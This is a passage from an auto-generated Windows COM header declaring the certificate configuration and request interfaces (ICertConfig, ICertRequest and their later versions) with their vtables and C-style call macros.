            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Reset )( 
            __RPC__in ICertConfig * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__out LONG *pCount);
        
        HRESULT ( STDMETHODCALLTYPE *Next )( 
            __RPC__in ICertConfig * This,
            /* [retval][out] */ __RPC__out LONG *pIndex);
        
        HRESULT ( STDMETHODCALLTYPE *GetField )( 
            __RPC__in ICertConfig * This,
            /* [in] */ __RPC__in const BSTR strFieldName,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrOut);
        
        HRESULT ( STDMETHODCALLTYPE *GetConfig )( 
            __RPC__in ICertConfig * This,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrOut);
        
        END_INTERFACE
    } ICertConfigVtbl;

    interface ICertConfig
    {
        CONST_VTBL struct ICertConfigVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertConfig_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertConfig_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertConfig_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertConfig_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertConfig_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertConfig_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertConfig_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertConfig_Reset(This,Index,pCount)	\
    ( (This)->lpVtbl -> Reset(This,Index,pCount) ) 

#define ICertConfig_Next(This,pIndex)	\
    ( (This)->lpVtbl -> Next(This,pIndex) ) 

#define ICertConfig_GetField(This,strFieldName,pstrOut)	\
    ( (This)->lpVtbl -> GetField(This,strFieldName,pstrOut) ) 

#define ICertConfig_GetConfig(This,Flags,pstrOut)	\
    ( (This)->lpVtbl -> GetConfig(This,Flags,pstrOut) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertConfig_INTERFACE_DEFINED__ */


#ifndef __ICertConfig2_INTERFACE_DEFINED__
#define __ICertConfig2_INTERFACE_DEFINED__

/* interface ICertConfig2 */
/* [unique][helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertConfig2;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("7a18edde-7e78-4163-8ded-78e2c9cee924")
    ICertConfig2 : public ICertConfig
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE SetSharedFolder( 
            /* [in] */ __RPC__in const BSTR strSharedFolder) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertConfig2Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertConfig2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertConfig2 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertConfig2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertConfig2 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertConfig2 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertConfig2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertConfig2 * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Reset )( 
            __RPC__in ICertConfig2 * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__out LONG *pCount);
        
        HRESULT ( STDMETHODCALLTYPE *Next )( 
            __RPC__in ICertConfig2 * This,
            /* [retval][out] */ __RPC__out LONG *pIndex);
        
        HRESULT ( STDMETHODCALLTYPE *GetField )( 
            __RPC__in ICertConfig2 * This,
            /* [in] */ __RPC__in const BSTR strFieldName,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrOut);
        
        HRESULT ( STDMETHODCALLTYPE *GetConfig )( 
            __RPC__in ICertConfig2 * This,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrOut);
        
        HRESULT ( STDMETHODCALLTYPE *SetSharedFolder )( 
            __RPC__in ICertConfig2 * This,
            /* [in] */ __RPC__in const BSTR strSharedFolder);
        
        END_INTERFACE
    } ICertConfig2Vtbl;

    interface ICertConfig2
    {
        CONST_VTBL struct ICertConfig2Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertConfig2_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertConfig2_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertConfig2_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertConfig2_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertConfig2_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertConfig2_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertConfig2_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertConfig2_Reset(This,Index,pCount)	\
    ( (This)->lpVtbl -> Reset(This,Index,pCount) ) 

#define ICertConfig2_Next(This,pIndex)	\
    ( (This)->lpVtbl -> Next(This,pIndex) ) 

#define ICertConfig2_GetField(This,strFieldName,pstrOut)	\
    ( (This)->lpVtbl -> GetField(This,strFieldName,pstrOut) ) 

#define ICertConfig2_GetConfig(This,Flags,pstrOut)	\
    ( (This)->lpVtbl -> GetConfig(This,Flags,pstrOut) ) 


#define ICertConfig2_SetSharedFolder(This,strSharedFolder)	\
    ( (This)->lpVtbl -> SetSharedFolder(This,strSharedFolder) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertConfig2_INTERFACE_DEFINED__ */


#ifndef __ICertRequest_INTERFACE_DEFINED__
#define __ICertRequest_INTERFACE_DEFINED__

/* interface ICertRequest */
/* [unique][helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertRequest;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("014e4840-5523-11d0-8812-00a0c903b83c")
    ICertRequest : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Submit( 
            /* [in] */ LONG Flags,
            /* [in] */ __RPC__in const BSTR strRequest,
            /* [in] */ __RPC__in const BSTR strAttributes,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [retval][out] */ __RPC__out LONG *pDisposition) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE RetrievePending( 
            /* [in] */ LONG RequestId,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [retval][out] */ __RPC__out LONG *pDisposition) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetLastStatus( 
            /* [retval][out] */ __RPC__out LONG *pStatus) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetRequestId( 
            /* [retval][out] */ __RPC__out LONG *pRequestId) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetDispositionMessage( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrDispositionMessage) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetCACertificate( 
            /* [in] */ LONG fExchangeCertificate,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrCertificate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetCertificate( 
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrCertificate) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertRequestVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertRequest * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertRequest * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertRequest * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertRequest * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertRequest * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertRequest * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertRequest * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Submit )( 
            __RPC__in ICertRequest * This,
            /* [in] */ LONG Flags,
            /* [in] */ __RPC__in const BSTR strRequest,
            /* [in] */ __RPC__in const BSTR strAttributes,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [retval][out] */ __RPC__out LONG *pDisposition);
        
        HRESULT ( STDMETHODCALLTYPE *RetrievePending )( 
            __RPC__in ICertRequest * This,
            /* [in] */ LONG RequestId,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [retval][out] */ __RPC__out LONG *pDisposition);
        
        HRESULT ( STDMETHODCALLTYPE *GetLastStatus )( 
            __RPC__in ICertRequest * This,
            /* [retval][out] */ __RPC__out LONG *pStatus);
        
        HRESULT ( STDMETHODCALLTYPE *GetRequestId )( 
            __RPC__in ICertRequest * This,
            /* [retval][out] */ __RPC__out LONG *pRequestId);
        
        HRESULT ( STDMETHODCALLTYPE *GetDispositionMessage )( 
            __RPC__in ICertRequest * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrDispositionMessage);
        
        HRESULT ( STDMETHODCALLTYPE *GetCACertificate )( 
            __RPC__in ICertRequest * This,
            /* [in] */ LONG fExchangeCertificate,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *GetCertificate )( 
            __RPC__in ICertRequest * This,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrCertificate);
        
        END_INTERFACE
    } ICertRequestVtbl;

    interface ICertRequest
    {
        CONST_VTBL struct ICertRequestVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertRequest_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertRequest_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertRequest_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertRequest_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertRequest_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertRequest_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertRequest_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertRequest_Submit(This,Flags,strRequest,strAttributes,strConfig,pDisposition)	\
    ( (This)->lpVtbl -> Submit(This,Flags,strRequest,strAttributes,strConfig,pDisposition) ) 

#define ICertRequest_RetrievePending(This,RequestId,strConfig,pDisposition)	\
    ( (This)->lpVtbl -> RetrievePending(This,RequestId,strConfig,pDisposition) ) 

#define ICertRequest_GetLastStatus(This,pStatus)	\
    ( (This)->lpVtbl -> GetLastStatus(This,pStatus) ) 

#define ICertRequest_GetRequestId(This,pRequestId)	\
    ( (This)->lpVtbl -> GetRequestId(This,pRequestId) ) 

#define ICertRequest_GetDispositionMessage(This,pstrDispositionMessage)	\
    ( (This)->lpVtbl -> GetDispositionMessage(This,pstrDispositionMessage) ) 

#define ICertRequest_GetCACertificate(This,fExchangeCertificate,strConfig,Flags,pstrCertificate)	\
    ( (This)->lpVtbl -> GetCACertificate(This,fExchangeCertificate,strConfig,Flags,pstrCertificate) ) 

#define ICertRequest_GetCertificate(This,Flags,pstrCertificate)	\
    ( (This)->lpVtbl -> GetCertificate(This,Flags,pstrCertificate) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertRequest_INTERFACE_DEFINED__ */


#ifndef __ICertRequest2_INTERFACE_DEFINED__
#define __ICertRequest2_INTERFACE_DEFINED__

/* interface ICertRequest2 */
/* [unique][helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertRequest2;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("a4772988-4a85-4fa9-824e-b5cf5c16405a")
    ICertRequest2 : public ICertRequest
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE GetIssuedCertificate( 
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [in] */ LONG RequestId,
            /* [in] */ __RPC__in const BSTR strSerialNumber,
            /* [retval][out] */ __RPC__out LONG *pDisposition) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetErrorMessageText( 
            /* [in] */ LONG hrMessage,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrErrorMessageText) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetCAProperty( 
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [in] */ LONG PropId,
            /* [in] */ LONG PropIndex,
            /* [in] */ LONG PropType,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__out VARIANT *pvarPropertyValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetCAPropertyFlags( 
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [in] */ LONG PropId,
            /* [retval][out] */ __RPC__out LONG *pPropFlags) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetCAPropertyDisplayName( 
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [in] */ LONG PropId,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrDisplayName) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetFullResponseProperty( 
            /* [in] */ LONG PropId,
            /* [in] */ LONG PropIndex,
            /* [in] */ LONG PropType,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__out VARIANT *pvarPropertyValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertRequest2Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertRequest2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertRequest2 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertRequest2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertRequest2 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertRequest2 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertRequest2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertRequest2 * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Submit )( 
            __RPC__in ICertRequest2 * This,
            /* [in] */ LONG Flags,
            /* [in] */ __RPC__in const BSTR strRequest,
            /* [in] */ __RPC__in const BSTR strAttributes,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [retval][out] */ __RPC__out LONG *pDisposition);
        
        HRESULT ( STDMETHODCALLTYPE *RetrievePending )( 
            __RPC__in ICertRequest2 * This,
            /* [in] */ LONG RequestId,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [retval][out] */ __RPC__out LONG *pDisposition);
        
        HRESULT ( STDMETHODCALLTYPE *GetLastStatus )( 
            __RPC__in ICertRequest2 * This,
            /* [retval][out] */ __RPC__out LONG *pStatus);
        
        HRESULT ( STDMETHODCALLTYPE *GetRequestId )( 
            __RPC__in ICertRequest2 * This,
            /* [retval][out] */ __RPC__out LONG *pRequestId);
        
        HRESULT ( STDMETHODCALLTYPE *GetDispositionMessage )( 
            __RPC__in ICertRequest2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrDispositionMessage);
        
        HRESULT ( STDMETHODCALLTYPE *GetCACertificate )( 
            __RPC__in ICertRequest2 * This,
            /* [in] */ LONG fExchangeCertificate,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *GetCertificate )( 
            __RPC__in ICertRequest2 * This,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *GetIssuedCertificate )( 
            __RPC__in ICertRequest2 * This,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [in] */ LONG RequestId,
            /* [in] */ __RPC__in const BSTR strSerialNumber,
            /* [retval][out] */ __RPC__out LONG *pDisposition);
        
        HRESULT ( STDMETHODCALLTYPE *GetErrorMessageText )( 
            __RPC__in ICertRequest2 * This,
            /* [in] */ LONG hrMessage,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrErrorMessageText);
        
        HRESULT ( STDMETHODCALLTYPE *GetCAProperty )( 
            __RPC__in ICertRequest2 * This,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [in] */ LONG PropId,
            /* [in] */ LONG PropIndex,
            /* [in] */ LONG PropType,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__out VARIANT *pvarPropertyValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetCAPropertyFlags )( 
            __RPC__in ICertRequest2 * This,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [in] */ LONG PropId,
            /* [retval][out] */ __RPC__out LONG *pPropFlags);
        
        HRESULT ( STDMETHODCALLTYPE *GetCAPropertyDisplayName )( 
            __RPC__in ICertRequest2 * This,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [in] */ LONG PropId,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrDisplayName);
        
        HRESULT ( STDMETHODCALLTYPE *GetFullResponseProperty )( 
            __RPC__in ICertRequest2 * This,
            /* [in] */ LONG PropId,
            /* [in] */ LONG PropIndex,
            /* [in] */ LONG PropType,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__out VARIANT *pvarPropertyValue);
        
        END_INTERFACE
    } ICertRequest2Vtbl;

    interface ICertRequest2
    {
        CONST_VTBL struct ICertRequest2Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertRequest2_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertRequest2_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertRequest2_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertRequest2_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertRequest2_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertRequest2_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertRequest2_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertRequest2_Submit(This,Flags,strRequest,strAttributes,strConfig,pDisposition)	\
    ( (This)->lpVtbl -> Submit(This,Flags,strRequest,strAttributes,strConfig,pDisposition) ) 

#define ICertRequest2_RetrievePending(This,RequestId,strConfig,pDisposition)	\
    ( (This)->lpVtbl -> RetrievePending(This,RequestId,strConfig,pDisposition) ) 

#define ICertRequest2_GetLastStatus(This,pStatus)	\
    ( (This)->lpVtbl -> GetLastStatus(This,pStatus) ) 

#define ICertRequest2_GetRequestId(This,pRequestId)	\
    ( (This)->lpVtbl -> GetRequestId(This,pRequestId) ) 

#define ICertRequest2_GetDispositionMessage(This,pstrDispositionMessage)	\
    ( (This)->lpVtbl -> GetDispositionMessage(This,pstrDispositionMessage) ) 

#define ICertRequest2_GetCACertificate(This,fExchangeCertificate,strConfig,Flags,pstrCertificate)	\
    ( (This)->lpVtbl -> GetCACertificate(This,fExchangeCertificate,strConfig,Flags,pstrCertificate) ) 

#define ICertRequest2_GetCertificate(This,Flags,pstrCertificate)	\
    ( (This)->lpVtbl -> GetCertificate(This,Flags,pstrCertificate) ) 


#define ICertRequest2_GetIssuedCertificate(This,strConfig,RequestId,strSerialNumber,pDisposition)	\
    ( (This)->lpVtbl -> GetIssuedCertificate(This,strConfig,RequestId,strSerialNumber,pDisposition) ) 

#define ICertRequest2_GetErrorMessageText(This,hrMessage,Flags,pstrErrorMessageText)	\
    ( (This)->lpVtbl -> GetErrorMessageText(This,hrMessage,Flags,pstrErrorMessageText) ) 

#define ICertRequest2_GetCAProperty(This,strConfig,PropId,PropIndex,PropType,Flags,pvarPropertyValue)	\
    ( (This)->lpVtbl -> GetCAProperty(This,strConfig,PropId,PropIndex,PropType,Flags,pvarPropertyValue) ) 

#define ICertRequest2_GetCAPropertyFlags(This,strConfig,PropId,pPropFlags)	\
    ( (This)->lpVtbl -> GetCAPropertyFlags(This,strConfig,PropId,pPropFlags) ) 

#define ICertRequest2_GetCAPropertyDisplayName(This,strConfig,PropId,pstrDisplayName)	\
    ( (This)->lpVtbl -> GetCAPropertyDisplayName(This,strConfig,PropId,pstrDisplayName) ) 

#define ICertRequest2_GetFullResponseProperty(This,PropId,PropIndex,PropType,Flags,pvarPropertyValue)	\
    ( (This)->lpVtbl -> GetFullResponseProperty(This,PropId,PropIndex,PropType,Flags,pvarPropertyValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertRequest2_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certcli_0000_0005 */
/* [local] */ 

typedef 
enum X509EnrollmentAuthFlags
    {
        X509AuthNone	= 0,
        X509AuthAnonymous	= 1,
        X509AuthKerberos	= 2,
        X509AuthUsername	= 4,
        X509AuthCertificate	= 8
    } 	X509EnrollmentAuthFlags;



extern RPC_IF_HANDLE __MIDL_itf_certcli_0000_0005_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certcli_0000_0005_v0_0_s_ifspec;

#ifndef __ICertRequest3_INTERFACE_DEFINED__
#define __ICertRequest3_INTERFACE_DEFINED__

/* interface ICertRequest3 */
/* [unique][helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertRequest3;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("AFC8F92B-33A2-4861-BF36-2933B7CD67B3")
    ICertRequest3 : public ICertRequest2
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE SetCredential( 
            /* [in] */ LONG hWnd,
            /* [in] */ X509EnrollmentAuthFlags AuthType,
            /* [in] */ __RPC__in BSTR strCredential,
            /* [in] */ __RPC__in BSTR strPassword) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetRequestIdString( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrRequestId) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetIssuedCertificate2( 
            /* [in] */ __RPC__in BSTR strConfig,
            /* [in] */ __RPC__in BSTR strRequestId,
            /* [in] */ __RPC__in BSTR strSerialNumber,
            /* [retval][out] */ __RPC__out LONG *pDisposition) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetRefreshPolicy( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertRequest3Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertRequest3 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertRequest3 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertRequest3 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertRequest3 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertRequest3 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
